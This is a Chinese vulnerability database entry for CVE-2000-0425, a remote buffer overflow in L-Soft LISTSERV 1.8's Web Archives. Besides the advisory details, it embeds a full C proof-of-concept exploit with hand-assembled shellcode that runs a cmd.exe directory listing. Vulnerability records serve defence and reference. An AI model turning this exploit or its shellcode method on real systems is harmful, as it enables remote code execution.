CVE-2000-0425
CVSS10.0
发布时间 :2000-05-03 00:00:00
修订时间 :2008-09-10 15:04:37
NMCOE    

[原文]Buffer overflow in the Web Archives component of L-Soft LISTSERV 1.8 allows remote attackers to execute arbitrary commands.


[CNNVD]L-Soft Listserv 1.8 Web Archives的缓冲区溢出漏洞(CNNVD-200005-021)

        L-Soft LISTSERV 1.8 的Web Archives组件存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0425
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0425
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-021
(官方数据源) CNNVD

- 其它链接及资源

http://www.lsoft.com/news/default.asp?item=Advisory0
(UNKNOWN)  CONFIRM  http://www.lsoft.com/news/default.asp?item=Advisory0
http://www.securityfocus.com/bid/1167
(UNKNOWN)  BID  1167
http://archives.neohapsis.com/archives/bugtraq/2000-05/0048.html
(UNKNOWN)  BUGTRAQ  20000505 Alert: Listserv Web Archives (wa) buffer overflow

- 漏洞信息

L-Soft Listserv 1.8 Web Archives的缓冲区溢出漏洞
危急 缓冲区溢出
2000-05-03 00:00:00 2005-07-27 00:00:00
远程※本地  
        L-Soft LISTSERV 1.8 的Web Archives组件存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞执行任意命令。

- 公告与补丁

        L-Soft has made patches available at the following location:
        http://www.lsoft.com/news/default.asp?item=advisory0

- 漏洞信息 (19893)

L-Soft Listserv 1.8 Web Archives Buffer Overflow Vulnerability (EDBID:19893)
windows remote
2000-05-01 Verified
0 David Litchfield
N/A [点击下载]
source: http://www.securityfocus.com/bid/1167/info

The Web Archive component of L-Soft Listserv contains unchecked buffer code exploitable by sending specially crafted requests to the Web Archive. This weakness will allow execution of arbitrary code by remote attackers.

/////////////////////////////////////////////////////////////////
//
//
// LSOFT's Listserv web archives wa.exe buffer overflow
//
//
// This is "proof of concept code" and will spawn a shell
// perform a directory listing and redirect the output
// to a file called "cerberus.txt". Will work on Windows NT 4
// SP6a
//
//
// David Litchfield (mnemonix@globalnet.co.uk)
//
// 1st May 2000
//
//
// Cut and paste the output into your web browser.
//
/////////////////////////////////////////////////////////////////

#include <stdio.h>
int main()
{
 unsigned char exploit[2000]="";
 int count = 0;

 while(count <100)
  {
   exploit[count]=0x90;
   count ++;
  }

 // push ebp
 exploit[count]=0x55;
 count ++;

 // mov ebp,esp
 exploit[count]=0x8B;
 count ++;
 exploit[count]=0xEC;
 count ++;

 // mov eax, 0x77f1a986
 exploit[count]=0xb8;
 count ++;
 exploit[count]=0x86;
 count ++;
 exploit[count]=0xa9;
 count ++;
 exploit[count]=0xf1;
 count ++;
 exploit[count]=0x77;
 count ++;

 // mov ebx, 0xffffffff
 exploit[count]=0xbb;
 count ++;
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xff;
 count ++;

 file://sub ebx, 0xffffff8B
 exploit[count]=0x83;
 count ++;
 exploit[count]=0xeb;
 count ++;
 exploit[count]=0x8B;
 count ++;

 // push ebx
 exploit[count]=0x53;
 count ++;

 // push "xt.s"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x73;
 count ++;
 exploit[count]=0x2e;
 count ++;
 exploit[count]=0x74;
 count ++;
 exploit[count]=0x78;
 count ++;

 file://push "ureb"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x62;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x72;
 count ++;
 exploit[count]=0x75;
 count ++;

 file://push "rec "
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x20;
 count ++;
 exploit[count]=0x63;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x72;
 count ++;

 file://push "> ri"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x69;
 count ++;
 exploit[count]=0x72;
 count ++;
 exploit[count]=0x20;
 count ++;
 exploit[count]=0x3e;
 count ++;

 file://push "d c/"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x2f;
 count ++;
 exploit[count]=0x63;
 count ++;
 exploit[count]=0x20;
 count ++;
 exploit[count]=0x64;
 count ++;

 file://push " exe"
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x78;
 count ++;
 exploit[count]=0x65;
 count ++;
 exploit[count]=0x20;
 count ++;


 file://push "cmd."
 exploit[count]=0x68;
 count ++;
 exploit[count]=0x63;
 count ++;
 exploit[count]=0x6d;
 count ++;
 exploit[count]=0x64;
 count ++;
 exploit[count]=0x2e;
 count ++;

 file://mov ebx, esp
 exploit[count]=0x8b;
 count ++;
 exploit[count]=0xdc;
 count ++;

 file://xor esi, esi
 exploit[count]=0x33;
 count ++;
 exploit[count]=0xf6;
 count ++;

 file://push esi
 exploit[count]=0x56;
 count ++;

 file://push ebx
 exploit[count]=0x53;
 count ++;

 file://call eax
 exploit[count]=0xff;
 count ++;
 exploit[count]=0xd0;
 count ++;

 // set a break point (int 3)
 while(count <420)
  {
   exploit[count]=0xCC;
   count ++;
  }


 // overwrite the return address

 exploit[count]=0x36;
 count ++;
 exploit[count]=0x28;
 count ++;
 exploit[count]=0xf3;
 count ++;
 exploit[count]=0x77;
 count ++;

 // put in 40 nops (0x90)

 while (count < 464)
  {
   exploit[count]=0x90;
   count ++;
  }

 // write our code that'll get us back into our un-tolower()ed string

 // move edx, 0xFFFFFFFF
 exploit[count]=0xBA;
 count ++;
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xFF;
 count ++;

 // sub edx, 0xFFDFAC87
 exploit[count]=0x81;
 count ++;
 exploit[count]=0xEA;
 count ++;
 exploit[count]=0x87;
 count ++;
 exploit[count]=0xAC;
 count ++;
 exploit[count]=0xDF;
 count ++;
 exploit[count]=0xFF;
 count ++;

 // jmp edx
 exploit[count]=0xFF;
 count ++;
 exploit[count]=0xE2;
 count ++;

 // set readable part in memory to stop first AV

 exploit[390]=0x36;
 exploit[390]=0xf3;
 exploit[391]=0x77;

 count = 0;
 while(count < 477)
  {
   printf("%%%x",exploit[count]);
   count ++;
  }

 return 0;
}		

- 漏洞信息

1311
L-Soft LISTSERV Web Archives Buffer Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-05-05 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站